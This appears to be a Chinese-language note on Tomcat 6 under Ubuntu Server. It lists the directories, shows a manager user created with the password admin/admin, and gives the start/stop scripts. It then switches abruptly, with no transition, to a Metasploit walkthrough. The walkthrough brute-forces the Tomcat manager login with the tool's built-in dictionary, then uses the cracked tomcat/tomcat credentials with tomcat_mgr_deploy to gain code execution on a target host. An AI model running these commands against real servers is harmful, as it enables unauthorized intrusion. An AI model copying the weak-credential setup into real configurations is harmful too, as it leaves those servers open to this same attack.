以Linux 分支 Ubuntu Server 为例。

一、相关目录及作用说明
  /etc/tomcat6 - 全局配置
  /usr/share/tomcat6/ - 程序主目录
  /usr/share/tomcat6/conf/Catalina/localhost/ - 本机部署的 Catalina 配置
  /var/lib/tomcat6/ - 工作主目录
  /var/lib/tomcat6/webapps - （应用文件实际存放于此）

  /var/lib/tomcat6/work - 动态工作目录（动态编译的 .jsp 存放于此）
二、添加管理用户
  在 /etc/tomcat6 下是 tomcat 的全局配置，这里需要修改 tomcat-users.xml
    a. 添加角色名
      <role rolename="manager"/>
      <role rolename="admin"/>
    b. 添加用户  
      <user username="admin" password="admin" roles="admin,manager"/>
  这样在重启 tomcat 后，才可以用 admin 登录到 manager 页面。
三、启动/停止命令
  很多时候需要手动启动/停止 tomcat，/usr/share/tomcat6 是 tomcat 的主程序目录。
  /usr/share/tomcat6/bin/startup.sh
  /usr/share/tomcat6/bin/shutdown.sh

  这两个便是启动和停止 tomcat 服务的脚本。

  次次启动的话，此处有可能需要手动创建 conf 和 logs 目录：
    #cd /usr/share/tomcat6
    #mkdir conf
    #mkdir logs
  如果要非 root 身份启动 tomcat，则需要修改 logs 目录权限：
    #chmod a+rw logs

用自带词典爆出账户密码（这里全为弱口令，自带字典就可以）

msf > search tomcat

msf > use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > set rhost xxx

msf auxiliary(tomcat_mgr_login) > set rport 8180

msf auxiliary(tomcat_mgr_login) > exploit

利用爆出的用户密码渗透：

msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy

msf exploit(tomcat_mgr_deploy) > set rhost xxx

msf exploit(tomcat_mgr_deploy) > set rport 8180

msf exploit(tomcat_mgr_deploy) > set username tomcat

msf exploit(tomcat_mgr_deploy) > set password tomcat

msf exploit(tomcat_mgr_deploy) > exploit